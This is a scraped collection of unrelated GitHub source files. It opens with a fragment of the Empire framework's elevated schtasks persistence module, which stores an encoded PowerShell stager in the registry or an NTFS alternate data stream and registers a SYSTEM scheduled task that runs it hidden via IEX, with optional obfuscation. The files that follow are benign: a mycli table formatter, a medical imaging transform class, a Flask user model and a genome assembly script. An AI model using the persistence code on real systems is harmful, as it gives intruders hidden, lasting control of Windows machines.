# for cleanup, remove any script from the specified storage location
# and remove the specified trigger
if cleanup.lower() == 'true':
if adsPath != '':
# remove the ADS storage location
if ".txt" not in adsPath:
print helpers.color("[!] For ADS, use the form C:\\users\\john\\AppData:blah.txt")
return ""
script = "Invoke-Command -ScriptBlock {cmd /C \"echo x > "+adsPath+"\"};"
else:
# remove the script stored in the registry at the specified reg path
path = "\\".join(regPath.split("\\")[0:-1])
name = regPath.split("\\")[-1]
script = "$RegPath = '"+regPath+"';"
script += "$parts = $RegPath.split('\\');"
script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
script += "$name = $parts[-1];"
script += "$null=Remove-ItemProperty -Force -Path $path -Name $name;"
script += "schtasks /Delete /F /TN "+taskName+";"
script += "'Schtasks persistence removed.'"
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
return script
if extFile != '':
# read in an external file as the payload and build a
# base64 encoded version as encScript
if os.path.exists(extFile):
f = open(extFile, 'r')
fileData = f.read()
f.close()
# unicode-base64 encode the script for -enc launching
encScript = helpers.enc_powershell(fileData)
statusMsg += "using external file " + extFile
else:
print helpers.color("[!] File does not exist: " + extFile)
return ""
else:
# if an external file isn't specified, use a listener
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
encScript = launcher.split(" ")[-1]
statusMsg += "using listener " + listenerName
if adsPath != '':
# store the script in the specified alternate data stream location
if ".txt" not in adsPath:
print helpers.color("[!] For ADS, use the form C:\\users\\john\\AppData:blah.txt")
return ""
script = "Invoke-Command -ScriptBlock {cmd /C \"echo "+encScript+" > "+adsPath+"\"};"
locationString = "$(cmd /c \''\''more < "+adsPath+"\''\''\'')"
else:
# otherwise store the script into the specified registry location
path = "\\".join(regPath.split("\\")[0:-1])
name = regPath.split("\\")[-1]
statusMsg += " stored in " + regPath
script = "$RegPath = '"+regPath+"';"
script += "$parts = $RegPath.split('\\');"
script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
script += "$name = $parts[-1];"
script += "$null=Set-ItemProperty -Force -Path $path -Name $name -Value "+encScript+";"
# note where the script is stored
locationString = "(gp "+path+" "+name+")."+name
# built the command that will be triggered by the schtask
triggerCmd = "'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\powershell.exe -NonI -W hidden -c \\\"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String("+locationString+")))\\\"'"
# sanity check to make sure we haven't exceeded the cmd.exe command length max
if len(triggerCmd) > 259:
print helpers.color("[!] Warning: trigger command exceeds the maximum of 259 characters.")
return ""
if onLogon != '':
script += "schtasks /Create /F /RU system /SC ONLOGON /TN "+taskName+" /TR "+triggerCmd+";"
statusMsg += " with "+taskName+" OnLogon trigger."
elif idleTime != '':
script += "schtasks /Create /F /RU system /SC ONIDLE /I "+idleTime+" /TN "+taskName+" /TR "+triggerCmd+";"
statusMsg += " with "+taskName+" idle trigger on " + idleTime + "."
else:
# otherwise assume we're doing a daily trigger
script += "schtasks /Create /F /RU system /SC DAILY /ST "+dailyTime+" /TN "+taskName+" /TR "+triggerCmd+";"
statusMsg += " with "+taskName+" daily trigger at " + dailyTime + "."
script += "'Schtasks persistence established "+statusMsg+"'"
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
return script
|
{
"content_hash": "fc82f1c2ceac95db29766c82c8a7ba88",
"timestamp": "",
"source": "github",
"line_count": 245,
"max_line_length": 203,
"avg_line_length": 42.220408163265304,
"alnum_prop": 0.4947795823665893,
"repo_name": "drshellface/Empire",
"id": "3f130c0e437caed1d909449a708226b368ed7671",
"size": "10344",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "lib/modules/powershell/persistence/elevated/schtasks.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "1966"
},
{
"name": "Java",
"bytes": "496"
},
{
"name": "Objective-C",
"bytes": "2664"
},
{
"name": "PHP",
"bytes": "2041"
},
{
"name": "PowerShell",
"bytes": "16082240"
},
{
"name": "Python",
"bytes": "2734314"
},
{
"name": "Shell",
"bytes": "7945"
}
],
"symlink_target": ""
}
|
from .tabulate import _text_type
import binascii
def pad(field, total, char=u" "):
return field + (char * (total - len(field)))
def get_separator(num, header_len, data_len):
sep = u"***************************[ %d. row ]***************************\n" % (num + 1)
return sep
def format_field(value):
# Returns the field as a text type, otherwise will hexify the string
try:
if isinstance(value, bytes):
return _text_type(value, "ascii")
else:
return _text_type(value)
except UnicodeDecodeError:
return _text_type('0x' + binascii.hexlify(value).decode('ascii'))
def expanded_table(rows, headers):
header_len = max([len(x) for x in headers])
max_row_len = 0
results = []
padded_headers = [pad(x, header_len) + u" |" for x in headers]
header_len += 2
for row in rows:
row = [format_field(x) for x in row]
row_len = max([len(x) for x in row])
row_result = []
if row_len > max_row_len:
max_row_len = row_len
for header, value in zip(padded_headers, row):
if value is None: value = '<null>'
row_result.append(u"%s %s" % (header, value))
results.append('\n'.join(row_result))
output = []
for i, result in enumerate(results):
output.append(get_separator(i, header_len, max_row_len))
output.append(result)
output.append('\n')
return ''.join(output)
|
{
"content_hash": "fe278800887a887ed05cd90fccc6c4e7",
"timestamp": "",
"source": "github",
"line_count": 49,
"max_line_length": 92,
"avg_line_length": 29.918367346938776,
"alnum_prop": 0.5593451568894953,
"repo_name": "mdsrosa/mycli",
"id": "128e9c690ce0d78d9ed614899c51da8c624ce63a",
"size": "1466",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "mycli/packages/expanded.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "223317"
},
{
"name": "Shell",
"bytes": "529"
}
],
"symlink_target": ""
}
|
import numpy as np
import functools
import scipy.interpolate
from . import _transforms
def requires_transform(func):
@functools.wraps(func)
def wrapper(self, *args, **kwargs):
if self.transform is None:
raise ValueError("No transform set for {} object {}".format(type(self), self))
return func(self, *args, **kwargs)
return wrapper
class ImageBase(np.ndarray):
"""
numpy.ndarray subclass with an affine transform associated with it
"""
def __new__(cls, input_array, transform=None):
# input_array is an already formed ndarray
# we want to make it our class type
obj = np.asarray(input_array).view(cls)
if transform is not None:
obj.transform = transform.copy()
return obj
def __array_finalize__(self, obj):
self.transform = getattr(obj, 'transform', None)
@requires_transform
def to_scanner(self, *args):
"""
Converts a 3d position in ImageBase space to the scanner
reference space. Argument can either be 3 individual floats
for x, y and z or a numpy array_like with final dimension of
size 3.
Raises a ValueError if no transform is set.
Parameters
----------
x : float
The x coordinate of the point
y : float
The y coordinate of the point
z : float
The z coordinate of the point
Returns
-------
numpy.ndarray
The transformed 3d point in scanner coordinates
"""
positions = _transforms.normalise_positions_for_transform(*args)
transformed_point = np.einsum("ij,...j", self.transform, positions)
return np.squeeze(np.asarray(transformed_point))[..., 0:3]
@requires_transform
def from_scanner(self, *args):
"""
Converts a 3d position in scanner space to the ImageBase
reference space. Argument can either be 3 individual floats
for x, y and z or a numpy array_like with final dimension of
size 3.
Raises a ValueError if no transform is set.
Parameters
----------
x : float
The x coordinate of the point
y : float
The y coordinate of the point
z : float
The z coordinate of the point
Returns
-------
numpy.ndarray
The transformed 3d point in ImageBase coordinates
"""
positions = _transforms.normalise_positions_for_transform(*args)
transformed_point = np.einsum("ij,...j",
np.linalg.inv(self.transform),
positions)
return np.squeeze(np.asarray(transformed_point))[..., 0:3]
@property
@requires_transform
def voxel_size(self):
"""
The dimensions of a voxel.
Returns
-------
numpy.ndarray
The dimensions of a voxel along each axis.
"""
return np.linalg.norm(self.transform, axis=0)[0:3]
@property
@requires_transform
def position(self):
"""
The centre of the ImageBase in scanner coordinates.
"""
return self.transform[:3, 3]
@property
@requires_transform
def slice_vector(self):
return self.transform[:3, 2] / np.linalg.norm(self.transform[:3, 2])
@property
@requires_transform
def row_vector(self):
return self.transform[:3, 0] / np.linalg.norm(self.transform[:3, 0])
@property
@requires_transform
def col_vector(self):
return self.transform[:3, 1] / np.linalg.norm(self.transform[:3, 1])
@requires_transform
def _closest_axis(self, target_axis):
voxel_axes = self.transform[:3, :3] / self.voxel_size
overlap = np.abs(np.dot(target_axis, voxel_axes))
return self.transform[:3, np.argmax(overlap)]
@property
@requires_transform
def axial_vector(self):
"""
Returns the image axis which is most closely aligned with the axial
direction. The returned vector is guaranteed to point in the positive
axial direction, even if the original volume vector is in the
opposite direction.
Returns
-------
numpy.ndarray
The most axial image axis
"""
# dot the three candidate vectors with (0, 0, 1)
best_axis = self._closest_axis((0, 0, 1))
norm_axis = best_axis / np.linalg.norm(best_axis)
# work out if we need to reverse the direction
return norm_axis if norm_axis[2] > 0 else -1 * norm_axis
@property
@requires_transform
def coronal_vector(self):
"""
Returns the image axis which is most closely aligned with the coronal
direction. The returned vector is guaranteed to point in the positive
coronal direction, even if the original volume vector is in the
opposite direction.
Returns
-------
numpy.ndarray
The most coronal image axis
"""
# dot the three candidate vectors with (0, 1, 0)
best_axis = self._closest_axis((0, 1, 0))
norm_axis = best_axis / np.linalg.norm(best_axis)
return norm_axis if norm_axis[1] > 0 else -1 * norm_axis
@property
@requires_transform
def sagittal_vector(self):
"""
Returns the image axis which is most closely aligned with the sagittal
direction. The returned vector is guaranteed to point in the positive
sagittal direction, even if the original volume vector is in the
opposite direction.
Returns
-------
numpy.ndarray
The most sagittal image axis
"""
# dot the three candidate vectors with (1, 0, 0)
best_axis = self._closest_axis((1, 0, 0))
norm_axis = best_axis / np.linalg.norm(best_axis)
return norm_axis if norm_axis[0] > 0 else -1 * norm_axis
@property
@requires_transform
def centre(self):
"""
Returns the centre of the image volume in scanner coordinates.
Returns
-------
numpy.ndarray
The centre of the image volume
:return:
"""
return self.to_scanner((np.array(self.shape[::-1]) - 1) / 2)
@requires_transform
def resample(self,
row_vector,
col_vector,
shape,
centre=(0, 0, 0),
voxel_size=(1, 1, 1),
method='linear'):
"""
Create a new volume by resampling this one using a different coordinate
system.
Parameters
----------
row_vector: array
Row direction vector for new volume
col_vector: array
Column direction vector for new volume
shape: array
The shape of the new volume, as slices, rows, columns
centre: array
The position of the centre of the new volume in scanner
coordinates, in mm
voxel_size: array
The size of each voxel in the new volume, in mm
method: str
The interpolation method to use - either "linear" or "nearest"
Returns
-------
suspect.base.ImageBase
The resampled volume
"""
# make sure row_vector and col_vector are normalised
row_vector = np.asanyarray(row_vector) / np.linalg.norm(row_vector)
col_vector = np.asanyarray(col_vector) / np.linalg.norm(col_vector)
# mgrid produces 3D index grids for the x, y and z coords separately
II, JJ, KK = np.mgrid[0:shape[2],
0:shape[1],
0:shape[0]].astype(np.float)
# shift the indices from the corner to the centre
II -= (shape[2] - 1) / 2
JJ -= (shape[1] - 1) / 2
KK -= (shape[0] - 1) / 2
# scale the indices by the size of the voxel
II *= voxel_size[0]
JJ *= voxel_size[1]
KK *= voxel_size[2]
slice_vector = np.cross(row_vector, col_vector)
# combine the x, y and z indices with the row, col and slice vectors
# to get the spatial coordinates at each point in the new volume
space_coords = II[..., np.newaxis] * row_vector \
+ JJ[..., np.newaxis] * col_vector \
+ KK[..., np.newaxis] * slice_vector + centre
image_coords = self.from_scanner(space_coords).reshape(*space_coords.shape)[..., ::-1].astype(np.int)
resampled = scipy.interpolate.interpn([np.arange(dim) for dim in self.shape],
self,
image_coords,
method=method,
bounds_error=False,
fill_value=0).squeeze()
transform = _transforms.transformation_matrix(row_vector,
col_vector,
space_coords[0, 0, 0],
voxel_size)
# we have to transpose the result to go from x, y, z to row, col, slice
return ImageBase(resampled.T, transform=transform)
|
{
"content_hash": "55464e142b0b8cc7f2466427fc42f684",
"timestamp": "",
"source": "github",
"line_count": 282,
"max_line_length": 109,
"avg_line_length": 33.54609929078014,
"alnum_prop": 0.5531712473572938,
"repo_name": "openmrslab/suspect",
"id": "0449cb28db81c4eeea66f88953fe0706c834a3fd",
"size": "9460",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "suspect/base.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "194195"
}
],
"symlink_target": ""
}
|
from werkzeug.security import generate_password_hash, check_password_hash
from flask_login import UserMixin
from app import login_manager, db
class User(UserMixin, db.Model):
"""
用户账号信息
"""
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(32), index=True, unique=True, nullable=True)
real_name = db.Column(db.String(32), index=True)
password_hash = db.Column(db.String(128), nullable=True)
power = db.Column(db.Integer, nullable=True)
created_date = db.Column(db.DateTime())
created_people = db.Column(db.String(32))
comment = db.Column(db.String(32))
@property
def password(self):
raise AttributeError('用户名或者密码错误')
@password.setter
def password(self, password):
self.password_hash = generate_password_hash(password)
def reset_password(self):
"""
密码重设,初始密码为123456
:return: None
"""
self.password = '123456'
def verify_password(self, password):
"""
将密码和密码哈希值比较,相同返回True,不同False
:param password:传入的密码
:return: True or False
"""
return check_password_hash(self.password_hash, password)
def __repr__(self):
return "<User '{}' >".format(self.username)
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
|
{
"content_hash": "e399787d962a9b4d0f738c54298c3b40",
"timestamp": "",
"source": "github",
"line_count": 49,
"max_line_length": 79,
"avg_line_length": 28.285714285714285,
"alnum_prop": 0.6406926406926406,
"repo_name": "lvhuiyang/cxcy-ims",
"id": "fbf937b064475a053e460feaee244dd5842a114a",
"size": "1482",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/models/user.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "3394"
},
{
"name": "HTML",
"bytes": "89877"
},
{
"name": "JavaScript",
"bytes": "1609"
},
{
"name": "Mako",
"bytes": "494"
},
{
"name": "Python",
"bytes": "74812"
}
],
"symlink_target": ""
}
|
import os
import houseKeeper
import graphLib
import alignerRobot
from operator import itemgetter
from itertools import groupby
# ## 0) Preprocess by removing embedded contigs (I: contigs.fasta ; O : noEmbed.fasta)
def obtainLength(folderName, fileName):
f = open(folderName + fileName, 'r')
tmp = f.readline().rstrip()
lenDic = {}
tmplen = 0
tmpName = ""
while len(tmp) > 0:
if tmp[0] == '>':
if tmplen != 0:
lenDic[tmpName] = tmplen
tmplen = 0
tmpName = tmp[1:]
else:
tmplen += len(tmp)
tmp = f.readline().rstrip()
lenDic[tmpName] = tmplen
f.close()
return lenDic
def findContigLength(folderName, option):
if option == "contigs":
print "\n\nfindContigLength(folderName)\n"
contigLength = {}
f = open(folderName + "smaller_contigs_Double.fasta", 'r')
tmp1 = f.readline().rstrip()
if len(tmp1) > 0:
tmp2 = f.readline().rstrip()
while len(tmp1) > 0 and len(tmp2) > 0:
contigLength[tmp1[1:]] = len(tmp2)
tmp1 = f.readline().rstrip()
if len(tmp1) > 0:
tmp2 = f.readline().rstrip()
f.close()
else:
print "\n\nfindContigLength(folderName)\n"
contigLength = {}
f = open(folderName + "improved_Double.fasta", 'r')
tmp1 = f.readline().rstrip()
if len(tmp1) > 0:
tmp2 = f.readline().rstrip()
while len(tmp1) > 0 and len(tmp2) > 0:
contigLength[tmp1[1:]] = len(tmp2)
tmp1 = f.readline().rstrip()
if len(tmp1) > 0:
tmp2 = f.readline().rstrip()
f.close()
f = open(folderName + "relatedReads_Double.fasta", 'r')
tmp1 = f.readline().rstrip()
if len(tmp1) > 0:
tmp2 = f.readline().rstrip()
while len(tmp1) > 0 and len(tmp2) > 0:
contigLength[tmp1[1:]] = len(tmp2)
tmp1 = f.readline().rstrip()
if len(tmp1) > 0:
tmp2 = f.readline().rstrip()
f.close()
return contigLength
def putListToFileO(folderName, sourceFileName, targetFileName, myList):
f = open(folderName + targetFileName + ".txt", 'w')
for eachitem in myList:
f.write(eachitem + '\n')
f.close()
command = "perl -ne 'if(/^>(\S+)/){$c=$i{$1}}$c?print:chomp;$i{$_}=1 if @ARGV' " + folderName + targetFileName + ".txt " + folderName + sourceFileName + " > " + folderName + targetFileName + ".fasta"
os.system(command)
def writeToFile_Double1(folderName, fileName1, fileName2, option="contig"):
f2 = open(folderName + fileName2, 'w')
fOriginal = open(folderName + fileName1, 'r')
readSet = []
tmp = fOriginal.readline().rstrip()
tmpRead = ""
while len(tmp) > 0:
if tmp[0] == '>':
if len(tmpRead) > 0:
readSet.append(tmpRead)
tmpRead = ""
else:
tmpRead = tmpRead + tmp
tmp = fOriginal.readline().rstrip()
readSet.append(tmpRead)
print "len(readSet)", len(readSet)
fOriginal.close()
if option == "contig":
header = ">Contig"
else:
header = ">Read"
for eachcontig, dum in zip(readSet, range(len(readSet))):
f2.write(header + str(dum) + "_p\n")
f2.write(eachcontig + '\n')
f2.write(header + str(dum) + "_d\n")
f2.write(houseKeeper.reverseComplement(eachcontig) + '\n')
f2.close()
def loadContigsFromFile(folderName, fileName):
f = open(folderName + fileName, 'r')
tmp = f.readline().rstrip()
dataDic = {}
tmpSeq = ""
tmpName = ""
while len(tmp) > 0:
if tmp[0] == '>':
if len(tmpSeq) != 0:
dataDic[tmpName] = tmpSeq
tmpSeq = ""
tmpName = tmp[1:]
else:
tmpSeq += tmp
tmp = f.readline().rstrip()
dataDic[tmpName] = tmpSeq
f.close()
return dataDic
def writeToFile(f2, runningIndex, seq):
f2.write(">Seg_" + str(runningIndex))
f2.write('\n')
f2.write(seq)
f2.write('\n')
# ## 5) Read the contigs out (I: startList, graphNodes, ; O:improved.fasta, openZone.txt)
def useAlignToGetLen(eachnode, i , nameDic, orientation, myContigsDic, readNum, folderName , mummerLink):
indexToAddNext = eachnode.nodeIndexList[i+1]
readNumNext = indexToAddNext / 2
orientationNext = indexToAddNext % 2
if len(nameDic) > 0:
orientationNext = nameDic[indexToAddNext]%2
readNumNext = nameDic[indexToAddNext]/2
if orientation == 0:
leftSeg= myContigsDic['Contig' + str(readNum) + '_' + 'p']
else:
leftSeg = myContigsDic['Contig' + str(readNum) + '_' + 'd']
if orientationNext == 0 :
rightSeg = myContigsDic['Contig' + str(readNumNext) + '_' + 'p']
else:
rightSeg = myContigsDic['Contig' + str(readNumNext) + '_' + 'd']
overlapInfo= align(leftSeg, rightSeg, folderName, mummerLink)
overlapLen = overlapInfo[0]
return overlapLen
def readContigOut(folderName, mummerLink, graphFileName, contigFile, outContigFile, outOpenList, nameDic={}):
print "readContigOut"
G = graphLib.seqGraph(0)
G.loadFromFile(folderName, graphFileName)
G.findStartEndList()
myContigsDic = loadContigsFromFile(folderName, contigFile)
contigUsed = [False for i in range(len(G.graphNodesList) / 2)]
seqToPrint = []
openList = []
noForRevMismatch = True
print len(G.graphNodesList)
for eachnode in G.graphNodesList:
print eachnode.nodeIndexList
if len(eachnode.nodeIndexList) > 0:
tmpSeq = ""
# ## debug consistency of t/f
ckList = []
for dummy in eachnode.nodeIndexList:
indexToAdd = dummy
readNum = indexToAdd / 2
ckList.append(contigUsed[readNum])
if (len(ckList) > 0 and not all(ckList) and any(ckList)):
noForRevMismatch = False
# ## end debug
if contigUsed[eachnode.nodeIndexList[0]/2] == False:
contigUsed[eachnode.nodeIndexList[0]/2] = True
contigUsed[eachnode.nodeIndexList[-1]/2] = True
for i in range(len(eachnode.nodeIndexList)):
indexToAdd = eachnode.nodeIndexList[i]
readNum = indexToAdd / 2
orientation = indexToAdd % 2
#print nameDic[indexToAdd]
if len(nameDic) > 0:
orientation = nameDic[indexToAdd]%2
readNum = nameDic[indexToAdd]/2
#print readNum
if i != len(eachnode.nodeIndexList) - 1:
overlapLenOld = eachnode.overlapList[i]
# Can we hijack here for the overlap Length... seems like minimal changes
overlapLen = useAlignToGetLen(eachnode, i , nameDic, orientation, myContigsDic, readNum, folderName , mummerLink)
# End Hijacking
print overlapLen, overlapLenOld
if orientation == 0:
tmpSeq = tmpSeq + myContigsDic['Contig' + str(readNum) + '_' + 'p'][0:-overlapLen]
else:
tmpSeq = tmpSeq + myContigsDic['Contig' + str(readNum) + '_' + 'd'][0:-overlapLen]
else:
if orientation == 0:
tmpSeq = tmpSeq + myContigsDic['Contig' + str(readNum) + '_' + 'p']
else:
tmpSeq = tmpSeq + myContigsDic['Contig' + str(readNum) + '_' + 'd']
if len(tmpSeq) > 0:
if eachnode.nodeIndex in G.myStartList:
openList.append('Segkk' + str(len(seqToPrint)) + ',noprev')
if eachnode.nodeIndex in G.myEndList:
openList.append('Segkk' + str(len(seqToPrint)) + ',nonext')
seqToPrint.append(tmpSeq)
print "No forward/reverse mismatch ?", noForRevMismatch
fImproved = open(folderName + outContigFile, 'w')
for eachcontig, dummyIndex in zip(seqToPrint, range(len(seqToPrint))):
print len(eachcontig)
fImproved.write(">Segkk" + str(dummyIndex) + '\n')
fImproved.write(eachcontig + '\n')
fImproved.close()
print "All contigs used? ", all(contigUsed)
print "NContig", len(seqToPrint)
f = open(folderName + outOpenList, 'w')
f.write(str(len(seqToPrint)) + '\n')
for eachitem in openList:
f.write(str(eachitem) + str('\n'))
f.close()
def obtainLinkInfo(folderName, mummerLink, inputFile, mummerFile):
thres = 5
minLen = 400
# thres = 10
# minLen = 200
writeToFile_Double1(folderName, inputFile + ".fasta", inputFile + "_Double.fasta", "contig")
fmyFile = open(folderName + inputFile + "_Double.fasta", 'r')
fSmaller = open(folderName + inputFile + "_contigs_Double.fasta", 'w')
tmp = fmyFile.readline().rstrip()
maxSize = 50000
myName = ""
while len(tmp) > 0:
if tmp[0] == '>':
fSmaller.write(tmp + '\n')
myName = tmp[1:]
else:
component = tmp[0:min(len(tmp), maxSize)]
countComp = len(component)
fSmaller.write(component)
component = tmp[max(0, len(tmp) - maxSize):len(tmp)]
fSmaller.write(component)
countComp = countComp + len(component)
print "DebugName", myName, countComp
fSmaller.write('\n')
tmp = fmyFile.readline().rstrip()
fSmaller.close()
fmyFile.close()
if True:
alignerRobot.useMummerAlignBatch(mummerLink, folderName, [[mummerFile, inputFile + "_contigs_Double.fasta", inputFile + "_contigs_Double.fasta", ""]], houseKeeper.globalParallel )
# alignerRobot.useMummerAlign(mummerLink, folderName, mummerFile, inputFile + "_contigs_Double.fasta", inputFile + "_contigs_Double.fasta")
lengthDic = obtainLength(folderName, inputFile + "_contigs_Double.fasta")
dataSetRaw = alignerRobot.extractMumData(folderName, mummerFile + "Out")
# ## Format [ helperStart, helperEnd , readStart, readEnd,matchLen1,matchLen2,percentMatch,helperName,readName]
dataSet = []
for eachitem in dataSetRaw:
helperStart, helperEnd , readStart, readEnd, matchLen1, matchLen2, percentMatch, helperName, readName = eachitem
detailHelper = helperName.split('_')
detailRead = readName.split('_')
if detailHelper[0] != detailRead[0] and helperName != readName and max(matchLen1, matchLen2) > minLen and readStart < readEnd and min(helperStart, readStart) < thres and min(lengthDic[helperName] - helperEnd, lengthDic[readName] - readEnd) + 1 < thres:
conditionForMatch = True
else:
conditionForMatch = False
if conditionForMatch :
if helperStart < thres:
dataSet.append((max(matchLen1, matchLen2), readName, helperName))
dataSet.sort(reverse=True)
numberOfContig = len(lengthDic)
return numberOfContig, dataSet
def truncateEndOfContigs(folderName, filenameIn, filenameOut, maxSize, lengthDic):
'''
fmyFile = open(folderName + "improved_Double.fasta", 'r')
fSmaller = open(folderName + "smaller_improvedContig.fasta", 'w')
maxSize = 25000
truncateEndOfContigs(folderName, "improved_Double.fasta", "smaller_improvedContig.fasta", 25000, lengthDic)
'''
fmyFile = open(folderName + filenameIn, 'r')
fSmaller = open(folderName + filenameOut, 'w')
tmp = fmyFile.readline().rstrip()
myName = ""
while len(tmp) > 0:
if tmp[0] == '>':
fSmaller.write(tmp + '\n')
myName = tmp[1:]
else:
component = tmp[0:min(len(tmp), maxSize)]
countComp = len(component)
fSmaller.write(component)
component = tmp[max(0, len(tmp) - maxSize):len(tmp)]
fSmaller.write(component)
countComp = countComp + len(component)
lengthDic[myName] = countComp
print "DebugName", myName, countComp
fSmaller.write('\n')
tmp = fmyFile.readline().rstrip()
fSmaller.close()
fmyFile.close()
def obtainLinkInfoReadContig(dummyI, mummerLink, folderName,thres, lengthDic, K):
dataSet = []
indexOfMum = ""
if dummyI < 10:
indexOfMum = "0" + str(dummyI)
else:
indexOfMum = str(dummyI)
'''
command = mummerLink + "nucmer --maxmatch --simplify -p " + folderName + "outRefine " + folderName + "smaller_improvedContig.fasta " + "relatedReads_Double.part-" + indexOfMum + ".fasta"
os.system(command)
command = mummerLink + "show-coords -r " + folderName + "outRefine.delta > " + folderName + "fromMumRefine" + indexOfMum
os.system(command)
'''
f = open(folderName + "fromMumRefine" + indexOfMum, 'r')
for i in range(6):
tmp = f.readline()
while len(tmp) > 0:
info = tmp.split('|')
filterArr = info[1].split()
rdGpArr = info[-1].split('\t')
firstArr = info[0].split()
matchLenArr = info[2].split()
matchLen = int(matchLenArr[1])
contigStart, contigEnd = int(firstArr[0]), int(firstArr[1])
readStart, readEnd = int(filterArr[0]) , int(filterArr[1])
contigName = rdGpArr[0].rstrip().lstrip()
readName = rdGpArr[1].rstrip().lstrip()
if readStart < readEnd and matchLen > K and min(contigStart, readStart) < thres and min(lengthDic[contigName] - contigEnd , lengthDic[readName] - readEnd) + 1 < thres:
conditionForMatch = True
else:
conditionForMatch = False
if conditionForMatch :
if contigStart < thres:
dataSet.append((readName, contigName, 'L', matchLen))
if lengthDic[contigName] - contigEnd + 1 < thres :
dataSet.append((readName, contigName, 'R', matchLen))
tmp = f.readline()
f.close()
return dataSet
### read from overlap
def writeSegOut(ctgList, folderName, fileout):
f = open(folderName + fileout, 'w')
for i in range(len(ctgList)):
f.write(">Segkk" + str(i) +'\n')
f.write(ctgList[i])
f.write("\n")
f.close()
def checkIncluded(tmp, markedList):
isIncluded = False
for i in tmp:
if markedList[i/2] == True:
isIncluded = True
return isIncluded
def align(leftSeg, rightSeg, folderName, mummerLink):
overlap = [0, 0 ]
lLen = 0
f = open(folderName + "leftSeg.fasta", 'w')
f.write(">SegL\n")
if len(leftSeg) < 50000:
f.write(leftSeg)
lLen = len(leftSeg)
else:
f.write(leftSeg[-50000:])
lLen = 50000
f.close()
rLen = 0
f = open(folderName + "rightSeg.fasta", 'w')
f.write(">SegR\n")
if len(rightSeg) < 50000:
f.write(rightSeg)
rLen = len(rightSeg)
else:
f.write(rightSeg[0:50000])
rLen = 50000
f.close()
alignerRobot.useMummerAlign(mummerLink, folderName, "overlap", "leftSeg.fasta", "rightSeg.fasta", False)
dataList = alignerRobot.extractMumData(folderName , "overlapOut")
thres = 10
if len(dataList) == 0:
overlap = [0, 0 ]
else:
myMax = [0, 0]
for eachitem in dataList:
if eachitem[1] > lLen - thres and eachitem[2] < thres:
if eachitem[5] > myMax[1]:
myMax[0] = eachitem[4]
myMax[1] = eachitem[5]
overlap = myMax
return overlap
def joinSeg(tmp, folderName, segLookUp, mummerLink):
ctg = segLookUp[tmp[0]]
tmpList = []
for i in range(len(tmp)-1):
overlapArr = align(segLookUp[tmp[i]], segLookUp[tmp[i+1]], folderName, mummerLink)
overlap = overlapArr[1]
print "overlap : ", overlap
if overlap >= 0 :
ctg = ctg + segLookUp[tmp[i+1]][overlap:]
else:
tmpList.append(ctg)
ctg = segLookUp[tmp[i+1]]
tmpList.append(ctg)
return tmpList
def readContigsFromFile(folderName, filename):
segLookUp = []
f = open(folderName + filename, 'r')
tmp = f.readline().rstrip()
tmpStr = ""
while len(tmp) > 0:
if tmp[0] == '>':
if len(tmpStr) > 0:
segLookUp.append(tmpStr)
tmpStr = ""
else:
tmpStr = tmpStr + tmp
tmp = f.readline().rstrip()
if len(tmpStr) > 0:
segLookUp.append(tmpStr)
tmpStr = ""
f.close()
return segLookUp
def extractGraphToContigs(G, folderName, mummerLink, fileout, filein):
N1 = len(G.graphNodesList)
markedList = [False for i in range(N1/2)]
segLookUp = readContigsFromFile(folderName, filein)
ctgList = []
for eachnode in G.graphNodesList:
if len(eachnode.nodeIndexList) > 0:
tmp = eachnode.nodeIndexList
isIncluded = checkIncluded(tmp, markedList)
for eachitem in tmp:
markedList[eachitem/2] = True
if not isIncluded :
ctgtmpList = joinSeg(tmp, folderName, segLookUp, mummerLink)
ctgList = ctgList + ctgtmpList
writeSegOut(ctgList, folderName, fileout)
def fillInMissed(folderName, mummerLink, filerefname, filequeryname, fileoutname):
os.system("mv " + folderName + fileoutname + " " + folderName + filequeryname )
alignerRobot.useMummerAlignBatch(mummerLink, folderName, [[fileoutname+"fillmiss", filerefname, filequeryname, ""]], houseKeeper.globalParallel)
dataList = alignerRobot.extractMumData(folderName, fileoutname+"fillmissOut")
lenDic = obtainLength(folderName, filerefname)
### Check if there is any missing parts
# Format of the dataList : 1 765 | 11596 10822 | 765 775 | 84.25 | ref_NC_001133_ scf7180000000702"
dataList.sort(key = itemgetter(-2))
thres = 100
extraList = []
for key, items in groupby(dataList, itemgetter(-2)):
isFound = False
for eachitem in items:
if abs(int(eachitem[4]) - lenDic[key]) < thres:
isFound = True
break
if not isFound:
extraList.append(key)
### Fill in any missing items
referenceDic = loadContigsFromFile(folderName, filerefname)
queryDic = loadContigsFromFile(folderName, filequeryname)
ctgList = [referenceDic[eachitem] for eachitem in extraList] + [queryDic[eachitem] for eachitem in queryDic]
writeSegOut(ctgList, folderName, fileoutname)
print "fileoutname: len(extraList)",fileoutname, len(extraList), len(ctgList)
|
{
"content_hash": "fc80a76770ed6421401cf030fa4920a1",
"timestamp": "",
"source": "github",
"line_count": 642,
"max_line_length": 262,
"avg_line_length": 31.25545171339564,
"alnum_prop": 0.5466460679756803,
"repo_name": "kakitone/finishingTool",
"id": "60e7939edaea8239114483ee2d60f81011429318",
"size": "20066",
"binary": false,
"copies": "1",
